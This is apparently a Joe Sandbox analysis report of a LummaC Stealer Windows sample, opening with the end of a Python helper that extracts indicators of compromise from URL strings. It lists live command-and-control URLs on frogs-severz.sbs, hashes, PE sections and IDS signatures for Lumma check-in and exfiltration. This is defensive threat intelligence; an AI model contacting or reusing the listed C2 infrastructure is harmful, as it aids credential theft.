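    "https://frogs-severz.sbs/apial", "https://frogs-severz.sbs/api=",
    "https://frogs-severz.sbs/apiz", "https://frogs-severz.sbs/4R",
    "https://frogs-severz.sbs/apisi", "https://frogs-severz.sbs:443/api",
    "https://frogs-severz.sbs/apig", "https://frogs-severz.sbs/api)",
    "https://frogs-severz.sbs/TR", "https://frogs-severz.sbs/apii",
    "https://frogs-severz.sbs/apiX", "https://frogs-severz.sbs/apia",
    "https://frogs-severz.sbs/api", "https://frogs-severz.sbs/",
    "https://contile-images.services.mozilla.com/obgoOYObjIFea_b",
    "not a url at all",
]

if __name__ == "__main__":
    report = consolidate(SAMPLE_URLS)
    for host, info in report.items():
        print(host, info)
    print("IOCs:", ioc_urls(report))
```

On the report's strings this yields the single indicator https://frogs-severz.sbs/api, matching the URL the sandbox actually saw contacted, and leaves /4R, /TR and the bare / as unexplained: two are fragments whose real prefix was not recovered, and the third is just the origin. The benign Mozilla URL produces no endpoint because a single string has no support. Keep the host itself as the primary indicator; Lumma operators rotate the path far less often than analysts assume, but the domain is what the network actually resolves.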
Name | Source | Malicious | Antivirus Detection | Reputation
https://contile-images.services.mozilla.com/obgoOYObjIFea_b | file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600188579.0000000001099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs/4R | file.exe, 00000000.00000002.1602899683.0000000001078000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600305728.0000000001077000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/apial | file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600238733.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs/api= | file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs/apiz | file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5 | file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208. | file.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs:443/api | file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs/apisi | file.exe, 00000000.00000003.1545581901.000000000109C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/apig | file.exe, 00000000.00000003.1545638694.0000000001081000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545660464.0000000001085000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/ | file.exe, 00000000.00000003.1600305728.0000000001077000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs/api) | file.exe, 00000000.00000003.1545638694.0000000001081000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545660464.0000000001085000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/apii | file.exe, 00000000.00000002.1602996314.000000000109D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware |
                                          unknown
                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://frogs-severz.sbs/TRfile.exe, 00000000.00000002.1602899683.0000000001078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctafile.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://frogs-severz.sbs/apiXfile.exe, 00000000.00000003.1600238733.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://frogs-severz.sbs/apiafile.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.88.250 | frogs-severz.sbs | United States | 13335 | CLOUDFLARENETUS | false
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1562133
                                                              Start date and time:2024-11-25 08:43:12 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 4m 30s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:file.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Stop behavior analysis, all processes terminated
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: file.exe
Time | Type | Description
02:44:16 | API Interceptor | 9x Sleep call for process: file.exe modified
Match: 104.21.88.250 (IP)
Associated Sample Name / URL | Detection | Threat Name
file.exe | malicious | Unknown
injector V2.5.exe | malicious | LummaC Stealer
SystemCoreHelper.dll | malicious | LummaC Stealer
b.exe | malicious | LummaC Stealer

Match: frogs-severz.sbs (Domain)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC Stealer | 172.67.155.47
file.exe | malicious | LummaC Stealer | 172.67.155.47
file.exe | malicious | Unknown | 104.21.88.250
Aquantia_Installer.exe | malicious | LummaC Stealer | 172.67.155.47
arcaneloader.exe | malicious | LummaC Stealer | 172.67.155.47
xLauncher.exe | malicious | LummaC Stealer | 172.67.155.47
injector V2.5.exe | malicious | LummaC Stealer | 104.21.88.250
SystemCoreHelper.dll | malicious | LummaC Stealer | 104.21.88.250
b.exe | malicious | LummaC Stealer | 104.21.88.250
file.exe | malicious | LummaC Stealer | 193.143.1.19

Match: CLOUDFLARENETUS (ASN)
Associated Sample Name / URL | Detection | Threat Name | Context
https://linktr.ee/priyanka662 | malicious | Gabagool | 172.67.74.152
t90RvrDNvz.exe | malicious | Unknown | 172.67.204.237
segura.vbs | malicious | Remcos | 172.67.187.200
asegurar.vbs | malicious | AsyncRAT, DcRat | 104.21.84.67
file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
file.exe | malicious | LummaC Stealer | 172.67.155.47
2Brb1DnRS6.wsf | malicious | Unknown | 172.67.204.2
pm4ozz83c4.vbs | malicious | Unknown | 172.67.204.2
Cargo Invoice_pdf.vbs | malicious | Remcos, GuLoader | 172.67.191.199
NEW P.O.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134

Match: a0e9f5d64349fb13191bc781f81f42e1 (JA3 fingerprint)
Associated Sample Name / URL | Detection | Threat Name | Context
t90RvrDNvz.exe | malicious | Unknown | 104.21.88.250
docx008.docx.doc | malicious | Unknown | 104.21.88.250
docx002.docx.doc | malicious | Unknown | 104.21.88.250
docx009.docx.doc | malicious | Unknown | 104.21.88.250
docx007.docx.doc | malicious | Unknown | 104.21.88.250
file.exe | malicious | LummaC Stealer | 104.21.88.250
P0-4856383648383364838364836483.xls | malicious | Unknown | 104.21.88.250
file.exe | malicious | LummaC Stealer | 104.21.88.250
file.exe | malicious | Unknown | 104.21.88.250
file.exe | malicious | LummaC Stealer | 104.21.88.250
                                                                      No context
                                                                      No created / dropped files found
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.947718222024007
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:1'844'224 bytes
                                                                      MD5:5032eea68452ff054956add942d03697
                                                                      SHA1:dc28bb50951074ec5d823e4bc94ba520796cc88f
                                                                      SHA256:940581abda4098f8858edda4080cff127a179db5c7ac9d6f357881569b703fdb
                                                                      SHA512:5f5b8377654f8722de23bb307739fd0f8c0970b9e62296462be9895a829558c47e709091b62f38c5f7e4b751b3ac066cd2ffe3da18bcd0f3a313855e1f06c666
                                                                      SSDEEP:24576:PfIP5v7kkYfJQuEK+C10moYvTCk/Fgo0yuUgo/kQSrM33RO3dT6NWYcY6yyyc9:XYIrf5ldoY7V/FgtUtkQO8M3dT6wYcy
                                                                      TLSH:B78533CB071CD462C882157583AF2B1273A929E855BB92096C447A751EBF36FF423E4F
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................@I...........@..........................pI.....~U....@.................................\...p..
                                                                      Icon Hash:00928e8e8686b000
                                                                      Entrypoint:0x894000
                                                                      Entrypoint Section:.taggant
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                      Instruction
                                                                      jmp 00007F37B4FDB84Ah
                                                                      lar ebx, word ptr [eax+eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      jmp 00007F37B4FDD845h
                                                                      add byte ptr [edi], al
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], dh
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edi], bl
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], 00000000h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      pop es
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], dh
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edi], bl
                                                                      add byte ptr [eax+000000FEh], ah
                                                                      add byte ptr [edx], ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], 00000000h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add dword ptr [edx], ecx
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      xor byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add dword ptr [eax+00000000h], eax
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      pop es
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], dh
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edx], ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], 00000000h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x56000 | 0x26200 | a5bad285fbadaf8f314b152eaed8b48e | False | 0.9992955942622951 | data | 7.98162486605094 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | f6e5ef71d4293163b92b20633d7f5565 | False | 0.794921875 | data | 6.022373815396692 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x59000 | 0x2a1000 | 0x200 | 0e6d266bb5fcc59f399659c457cdd772 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qozugtow | 0x2fa000 | 0x199000 | 0x198400 | ca62d69fe94c9e6e628dea36b08952b1 | False | 0.9945777757578077 | data | 7.953498445966998 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qlsbilts | 0x493000 | 0x1000 | 0x600 | a29aed7a73d77dc2bb5f5cf7c4e698b2 | False | 0.6009114583333334 | data | 5.251207823515013 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x494000 | 0x3000 | 0x2200 | a4df1fbdb74ab4a9bde6a9e41a3f6e6b | False | 0.05698529411764706 | DOS executable (COM) | 0.7302447780823378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4920c4 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T08:44:18.805230+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49722 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:19.488836+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49722 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:19.488836+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49722 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:20.760278+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49728 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:21.447383+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49728 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:21.447383+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49728 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:23.017010+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49734 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:25.390045+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49740 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:28.079334+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49746 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:30.698245+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49756 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:31.413842+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49756 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:33.207388+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49765 | 104.21.88.250 | 443 | TCP
2024-11-25T08:44:37.037756+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49776 | 104.21.88.250 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 08:44:17.529583931 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:17.529627085 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:17.529722929 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:17.532907009 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:17.532922983 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:18.805152893 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:18.805229902 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:18.808540106 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:18.808548927 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:18.808828115 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:18.850169897 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:18.853734016 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:18.853773117 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:18.853984118 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:19.488953114 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:19.489202976 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:19.489322901 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:19.490722895 CET | 49722 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:19.490741014 CET | 443 | 49722 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:19.542676926 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
Nov 25, 2024 08:44:19.542701960 CET | 443 | 49728 | 104.21.88.250 | 192.168.2.9
Nov 25, 2024 08:44:19.542859077 CET | 49728 | 443 | 192.168.2.9 | 104.21.88.250
